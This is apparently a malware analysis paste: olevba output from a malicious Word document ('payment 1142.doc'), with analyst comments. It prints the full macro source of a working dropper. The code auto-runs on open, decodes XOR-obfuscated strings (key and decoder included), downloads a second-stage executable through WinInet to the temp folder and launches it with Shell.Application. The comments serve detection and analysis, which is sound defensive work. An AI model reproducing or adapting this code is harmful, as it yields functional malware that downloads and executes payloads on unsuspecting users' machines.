dynamoo

Malicious Word macro

Mar 25th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- payment 1142.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: payment 1142.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: payment 1142.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' ANALYST NOTE: AutoOpen entry point - runs as soon as the document is opened
      ' with macros enabled. Its only statement is a call to HAZ82771 (Module4),
      ' which in turn calls HONOOROA (Module5), the downloader/dropper routine.
  16. HAZ82771
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. '*3
      ' ANALYST NOTE: hex-encoded, XOR-obfuscated string. HONOOROA (Module5) decodes
      ' it with STOP7777777777(HAZ82772, HAZ82774) and passes the result to
      ' SOLOMKA110 as sURL - i.e. this is the download URL of the second-stage
      ' payload. olevba --decode only strips the hex layer; the Module6 routine
      ' (hex-decode, then XOR with the key below) recovers the plaintext.
  30. Public Const HAZ82774 = "1E1002035E597C29373725252A76591C1B01061203137D307B3C2A3A2A36545D120159170615352379607678262054"
  31. '*4
      ' ANALYST NOTE: decodes (same routine, same key) to the ProgID
      ' "Scripting.FileSystemObject"; HONOOROA feeds it to CreateObject.
  32. Public Const HAZ82773 = "2507041A14023A2A317D023F2F3D620A0510131E2B1439213527"
  33. '*5
      ' ANALYST NOTE: the repeating XOR key used by STOP7777777777 (Module6) for
      ' every obfuscated string in this sample (HAZ82773 .. HAZ82776).
  34. Public Const HAZ82772 = "svdvsdvSDVSDVCX1"
  35.  
  36. Sub HAZ82771()
      ' ANALYST NOTE: pass-through stub between autoopen (ThisDocument) and the
      ' real routine HONOOROA (Module5); it only adds one more hop to the call chain.
  37. HONOOROA
  38. End Sub
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. ANALYSIS:
  48. +------------+----------------+-----------------------------------------+
  49. | Type       | Keyword        | Description                             |
  50. +------------+----------------+-----------------------------------------+
  51. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  52. |            |                | be used to obfuscate strings (option    |
  53. |            |                | --decode to see all)                    |
  54. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  55. |            |                | may be used to obfuscate strings        |
  56. |            |                | (option --decode to see all)            |
  57. +------------+----------------+-----------------------------------------+
  58. -------------------------------------------------------------------------------
  59. VBA MACRO Module11.bas
  60. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module11'
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. '* 1
      ' ANALYST NOTE: decodes (STOP7777777777 with key HAZ82772) to the ProgID
      ' "Shell.Application". HONOOROA creates that object and calls .Open on the
      ' dropped file, which is what launches the downloaded executable.
  63. Public Const HAZ82776 = "250C131F08581234263F2D35222C581C18"
  64.  
  65. '*2
      ' ANALYST NOTE: decodes to the file name "\solken1.2.8.exe". HONOOROA appends
      ' it to the path returned by FSO GetSpecialFolder(2) (the temp folder) to
      ' build the drop location for the downloaded payload.
  66. Public Const HAZ82775 = "2A17191F081D362A677D76787B76540B13"
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. ANALYSIS:
  69. +------------+-------------+-----------------------------------------+
  70. | Type       | Keyword     | Description                             |
  71. +------------+-------------+-----------------------------------------+
  72. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  73. |            |             | be used to obfuscate strings (option    |
  74. |            |             | --decode to see all)                    |
  75. +------------+-------------+-----------------------------------------+
  76. -------------------------------------------------------------------------------
  77. VBA MACRO Module1.bas
  78. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module1'
  79. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  80. ' (File name: AddNewSheet.bas)
  81. ' Author: SENOO, Ken
  82. ' LICENSE: CC0
  83. ' (Last update: 2015-03-10T18:38+09:00)
  84.  
  85. Sub AddNewSheet(sheet_name)
      ' ANALYST NOTE: benign, CC0-licensed Excel helper (see the attribution header
      ' above). It uses Worksheets / Sheets / ActiveSheet, which belong to Excel's
      ' object model rather than Word's, and no other extracted module references
      ' it - almost certainly filler added to pad the project with innocuous code.
  86.  
  87. ' csss
      ' Deletes any existing sheet with the requested name (alerts suppressed).
  88. For Each ws In Worksheets
  89.   If ws.Name = sheet_name Then
  90.     Application.DisplayAlerts = False
  91.     ws.Delete
  92.     Application.DisplayAlerts = True
  93.   End If
  94. Next ws
  95.  
  96. ' cscc
      ' Adds a fresh sheet after the active one and names it.
  97. Sheets.Add(After:=ActiveSheet).Name = sheet_name
  98.  
  99. End Sub
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101. ANALYSIS:
  102. No suspicious keyword or IOC found.
  103. -------------------------------------------------------------------------------
  104. VBA MACRO UFO.frm
  105. in file: payment 1142.doc - OLE stream: u'Macros/VBA/UFO'
  106. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  107. (empty macro)
  108. -------------------------------------------------------------------------------
  109. VBA MACRO Class1.cls
  110. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Class1'
  111. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  112. (empty macro)
  113. -------------------------------------------------------------------------------
  114. VBA MACRO Module3.bas
  115. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module3'
  116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  117. Option Explicit
  118.  
  119.  
       ' ANALYST NOTE: chunk size for InternetReadFile and the length of the
       ' fixed-length receive buffer in SOLOMKA110.
  120. Private Const KAIIOOOO872 = 8162
       ' ANALYST NOTE: passed to InternetOpenA as the User-Agent. A literal
       ' "KAIIOOOO871" UA in proxy / egress logs is a cheap detection hook for
       ' this sample.
  121. Private Const KAIIOOOO871 As String = "KAIIOOOO871"
       ' ANALYST NOTE: dwAccessType for InternetOpenA; 1 = INTERNET_OPEN_TYPE_DIRECT
       ' (no proxy settings applied).
  122. Private Const KAIIOOOO999 = 1
       ' ANALYST NOTE: dwFlags for InternetOpenUrlA; &H4000000 =
       ' INTERNET_FLAG_NO_CACHE_WRITE, so the payload is not left in the WinInet
       ' cache (one less artefact for forensics).
  123. Private Const cCCc = &H4000000
  124. Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
       ' ANALYST NOTE: WinInet downloader. Fetches sURL and writes the response
       ' body to sFileName; returns True if at least one byte was received.
       ' The API names are hidden behind aliases declared in Module2:
       '   SOLOMKA110222  = InternetOpenA
       '   SOLOMKA1102    = InternetOpenUrlA
       '   KOOOODAAAAA1   = InternetReadFile
       '   SOLOMKA1102222 = InternetCloseHandle
       ' Called once from HONOOROA (Module5) with the decoded URL and the
       ' %TEMP% drop path; the caller then launches the file.
  125.     #If VBA7 And Win64 Then
  126.         Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
  127.     #Else
  128.         Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
  129.     #End If
           ' CDSFDFD: bytes returned by the last InternetReadFile call.
  130.     Dim CDSFDFD As Long
           ' HCDNNNDCNNDC: fixed-length receive buffer (KAIIOOOO872 = 8162 bytes);
           ' KAIIOOOO874: accumulated response body.
  131.     Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
  132.     Dim VVzzVz As Integer, dData As Double
           ' InternetOpenA(UA "KAIIOOOO871", INTERNET_OPEN_TYPE_DIRECT, no proxy);
           ' a NULL session handle aborts with the default return of False.
  133.     HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
  134.     If HCDNNNDCNNDC2 = 0 Then
  135.         Exit Function
  136.     End If
           ' InternetOpenUrlA(session, sURL, no headers, INTERNET_FLAG_NO_CACHE_WRITE).
  137.     KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
  138.     If KAIIOOOO873 = 0 Then
  139.         dData = 0
  140.     Else
               ' Read loop: one InternetReadFile call before the loop, then keep
               ' reading 8162-byte chunks until a call reports 0 bytes read.
  141.         KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
  142.         KAIIOOOO874 = HCDNNNDCNNDC
  143.         Do While CDSFDFD <> 0
  144.             KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
  145.            
               ' Junk: a single-iteration loop whose "= 5" condition can never be
               ' true; the same pattern appears throughout HONOOROA (Module5).
  146.             Dim HhhhhHHuuU73772 As Integer
  147. For HhhhhHHuuU73772 = 0 To 0
  148. If HhhhhHHuuU73772 = 5 Then End
  149. Next HhhhhHHuuU73772
  150.            
  151.             KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
  152.         Loop
               ' Write the whole body to sFileName in binary mode (Open / Put / Close).
  153.         dData = Len(KAIIOOOO874): VVzzVz = FreeFile
  154.         Open sFileName For Binary Access Write Lock Write As #VVzzVz
  155.         Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
  156.     End If
           ' InternetCloseHandle on the URL handle and the session handle.
  157.     SOLOMKA1102222 KAIIOOOO873
  158.     SOLOMKA1102222 HCDNNNDCNNDC2
  159.     KAIIOOOO874 = ""
           ' True only when something was downloaded (dData = body length).
  160.     If dData Then
  161.         SOLOMKA110 = True
  162.     End If
  163. End Function
  164. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  165. ANALYSIS:
  166. +------------+-------------+-----------------------------------------+
  167. | Type       | Keyword     | Description                             |
  168. +------------+-------------+-----------------------------------------+
  169. | Suspicious | Open        | May open a file                         |
  170. | Suspicious | Write       | May write to a file (if combined with   |
  171. |            |             | Open)                                   |
  172. | Suspicious | Put         | May write to a file (if combined with   |
  173. |            |             | Open)                                   |
  174. | Suspicious | Binary      | May read or write a binary file (if     |
  175. |            |             | combined with Open)                     |
  176. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  177. |            |             | be used to obfuscate strings (option    |
  178. |            |             | --decode to see all)                    |
  179. +------------+-------------+-----------------------------------------+
  180. -------------------------------------------------------------------------------
  181. VBA MACRO Module2.bas
  182. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module2'
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184.  
       ' ANALYST NOTE: wininet.dll imports under meaningless aliases; the two
       ' branches only differ in LongPtr vs Long so the macro also runs on 64-bit
       ' Office. Mapping used by SOLOMKA110 (Module3):
       '   SOLOMKA1102222 -> InternetCloseHandle
       '   SOLOMKA110222  -> InternetOpenA        (creates the session, sets the UA)
       '   KOOOODAAAAA1   -> InternetReadFile     (reads the response in chunks)
       '   SOLOMKA1102    -> InternetOpenUrlA     (opens the URL)
       ' "wininet.dll" is the only API string left in clear - olevba flags it as an
       ' IOC below. Office processes loading wininet and then writing to %TEMP% is
       ' the behavioural signature to hunt for.
  185. #If VBA7 And Win64 Then
  186. Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  187. Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  188. Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  189. Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  190. #Else
  191. Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  192. Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  193. Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  194. Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  195. #End If
  196.  
  197.  
  198. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  199. ANALYSIS:
  200. +------------+----------------+-----------------------------------------+
  201. | Type       | Keyword        | Description                             |
  202. +------------+----------------+-----------------------------------------+
  203. | Suspicious | Lib            | May run code from a DLL                 |
  204. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  205. |            |                | be used to obfuscate strings (option    |
  206. |            |                | --decode to see all)                    |
  207. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  208. |            |                | may be used to obfuscate strings        |
  209. |            |                | (option --decode to see all)            |
  210. | IOC        | wininet.dll    | Executable file name                    |
  211. +------------+----------------+-----------------------------------------+
  212. -------------------------------------------------------------------------------
  213. VBA MACRO Module5.bas
  214. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module5'
  215. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  216.  
  217.  
  218. Sub _
  219. HONOOROA()
       ' ANALYST NOTE: the dropper. Reached via autoopen -> HAZ82771 -> here.
       ' Flow: create Scripting.FileSystemObject -> resolve the temp folder ->
       ' build the drop path -> delete any stale copy -> download with SOLOMKA110
       ' (WinInet, Module3) -> launch via Shell.Application.Open.
       ' Module5 has no Option Explicit, so HAZ82767, SSSS and SASASA are implicit
       ' Variants. Every "For x = 0 To 0 / If x = 5 Then End" block is junk: one
       ' iteration, a condition that can never hold. Line continuations ("_") are
       ' used to split even keywords across lines, presumably to defeat simple
       ' pattern matching.
  220. '* cASCAccaCACA
  221. Dim _
  222. HAZ82769
  223. Dim SiCoUnT As Integer
  224.  
       ' Dead loop: SiCoUnT is assigned but never read.
  225. Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
  226. For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
  227. SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
  228. Next VgdgHH333jKKkllKAHNXNHHGDG87293
  229.  
       ' HAZ82773 decodes to "Scripting.FileSystemObject".
  230. Set HAZ82769 = CreateObject _
  231. (STOP7777777777 _
  232. (HAZ82772, HAZ82773))
  233. Dim HAZ82768
       ' 2 = TemporaryFolder in the FileSystemObject SpecialFolder enumeration
       ' (0 = Windows, 1 = System), i.e. the user's %TEMP%.
  234. Const HAZ82768ID = 2
  235. Dim JHAIICENAU019 As Integer
  236. For JHAIICENAU019 = 0 To 0
  237. If JHAIICENAU019 = 5 Then End
  238. Next JHAIICENAU019
  239. Set HAZ82768 = HAZ82769.GetSpecialFolder _
  240. (HAZ82768ID)
  241. Dim chdhai93 As Integer
  242. For chdhai93 = 0 To 0
  243. If chdhai93 = 5 Then End
  244. Next chdhai93
       ' Drop path = <temp folder> & decode(HAZ82775); HAZ82775 decodes to
       ' "\solken1.2.8.exe".
  245. HAZ82767 = HAZ82768 & STOP7777777777 _
  246. (HAZ82772, HAZ82775)
  247. Dim hiaopen847 As Integer
  248. For hiaopen847 = 0 To 0
  249. If hiaopen847 = 5 Then End
  250. Next hiaopen847
       ' A second FSO instance, used only to remove a pre-existing file at the
       ' drop path before downloading.
  251. Set HAZ82769 = CreateObject _
  252. (STOP7777777777 _
  253. (HAZ82772, HAZ82773))
  254. Dim BnBnHgs346 As Integer
  255. For BnBnHgs346 = 0 To 0
  256. If BnBnHgs346 = 5 Then End
  257. Next BnBnHgs346
  258. If HAZ82769.FileExists _
  259. (HAZ82767) Then
  260. HAZ82769. _
  261. DeleteFile HAZ82767
  262. End If
       ' The download: decode(HAZ82774) is the URL, HAZ82767 the destination.
       ' SOLOMKA110's Boolean result is ignored (empty If body).
  263. If SOLOMKA110(STOP7777777777 _
  264. (HAZ82772, HAZ82774), HAZ82767) Then
  265. End If
       ' SSSS is never assigned, and the FileExists check below has an empty
       ' body - both are noise.
  266. Set SSSS = Nothing
  267. If HAZ82769. _
  268. FileExists _
  269. (HAZ82767) Then
  270. End If
       ' HAZ82776 decodes to "Shell.Application"; .Open on the dropped path
       ' executes the downloaded file. Execution of a fresh binary from %TEMP% by
       ' an Office process is the point to block or alert on.
  271. Set SASASA = CreateObject _
  272. (STOP7777777777 _
  273. (HAZ82772, HAZ82776))
  274. SASASA.Open HAZ82767
  275. End Sub
  276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  277. ANALYSIS:
  278. +------------+--------------+-----------------------------------------+
  279. | Type       | Keyword      | Description                             |
  280. +------------+--------------+-----------------------------------------+
  281. | Suspicious | CreateObject | May create an OLE object                |
  282. | Suspicious | Open         | May open a file                         |
  283. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  284. |            |              | be used to obfuscate strings (option    |
  285. |            |              | --decode to see all)                    |
  286. +------------+--------------+-----------------------------------------+
  287. -------------------------------------------------------------------------------
  288. VBA MACRO Module6.bas
  289. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module6'
  290. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  291. Option Explicit
  292.  
  293. Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
       ' ANALYST NOTE: string de-obfuscation routine used for every ProgID, path
       ' and URL string in this sample.
       '   STOP777777777 - XOR key (HAZ82772 at every call site)
       '   STOP77777777  - ciphertext, two hex digits per byte
       ' Byte i (1-based) is XORed with key character ((i Mod Len(key)) + 1), so
       ' the key stream starts at the key's SECOND character and wraps round.
       ' Beware the look-alike locals: asasas1O (letter O) is the output string,
       ' asasas10 (digit zero) is the current byte.
  294.     Dim asasas1 As Long
  295.     Dim asasas1O As String
  296.     Dim asasas10 As Integer
  297.     Dim asasas101 As Integer
           ' One iteration per hex pair.
  298.     For asasas1 = 1 To (Len(STOP77777777) / 2)
               ' Hex pair -> byte value via Val("&H..").
  299.         asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
               ' Key character for this position (rotated by one, see above).
  300.         asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
               ' XOR and append as a character.
  301.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
  302.     Next asasas1
  303.    STOP7777777777 = asasas1O
  304. End Function
  305. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  306. ANALYSIS:
  307. +------------+-------------+-----------------------------------------+
  308. | Type       | Keyword     | Description                             |
  309. +------------+-------------+-----------------------------------------+
  310. | Suspicious | Chr         | May attempt to obfuscate specific       |
  311. |            |             | strings                                 |
  312. | Suspicious | Xor         | May attempt to obfuscate specific       |
  313. |            |             | strings                                 |
  314. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  315. |            |             | be used to obfuscate strings (option    |
  316. |            |             | --decode to see all)                    |
  317. +------------+-------------+-----------------------------------------+